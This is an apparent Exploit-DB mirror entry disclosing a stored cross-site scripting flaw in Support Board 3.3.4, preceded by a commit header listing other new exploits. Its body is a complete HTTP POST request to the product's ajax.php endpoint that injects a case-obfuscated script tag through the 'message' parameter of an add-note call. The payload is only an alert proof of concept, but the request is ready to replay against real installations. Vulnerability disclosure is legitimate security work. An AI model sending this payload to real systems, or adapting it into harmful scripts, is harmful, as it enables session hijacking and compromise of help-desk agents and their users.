exploit-db-mirror/exploits/php/webapps/50419.txt
Offensive Security 0a3e0862c8 DB: 2021-10-19
8 changes to exploits/shellcodes

Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
Plastic SCM 10.0.16.5622 - WebAdmin Server Access
2021-10-19 05:02:14 +00:00

19 lines
No EOL
771 B
Text

# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
# Date: 16/10/2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.4
# Tested on: Ubuntu 20.04.2 LTS, Windows 10
POST /supportboard/include/ajax.php HTTP/1.1
Cookie: [Agent+]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 808
X-Requested-With: XMLHttpRequest
Connection: close
function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false